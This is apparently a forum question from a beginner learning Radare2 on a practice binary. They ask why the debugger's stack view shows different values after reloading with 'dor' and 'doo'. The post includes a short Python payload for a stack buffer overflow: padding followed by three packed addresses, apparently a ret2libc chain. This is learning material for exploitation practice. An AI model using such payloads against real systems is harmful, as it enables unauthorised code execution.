I'm new to Radare2 so i'm trying to learn it by doing some basic buffer overflows. My problem is that, when i try to load some payloads, the stack seems to fake them in some differents ways...
For example, trying to load the input by invoking a simple python script
import struct
def p (x):
return struct.pack('<I',x)
param = ""
param += "A"*30
param += p(0xb7e40db0)
param += p(0xb7e349e0)
param += p(0xb7f61b0b)
print param
And using this for run it.
r2 -d bufferoverflow `python payload.py`
I get this stack when overflows.
I don't use to get any problem by running it this way
However, when i've set some breakpoints, customize some views in order to be more confortable, I've try to reload the file by using "dor" and "doo" commands from Radare2
But now Radare2 seems to start faking the stack with some random values...
I'm not sure if it's a problem of mine because i'm doing it the wrong way, or if it's caused by a Radare2 behavior that i don't know.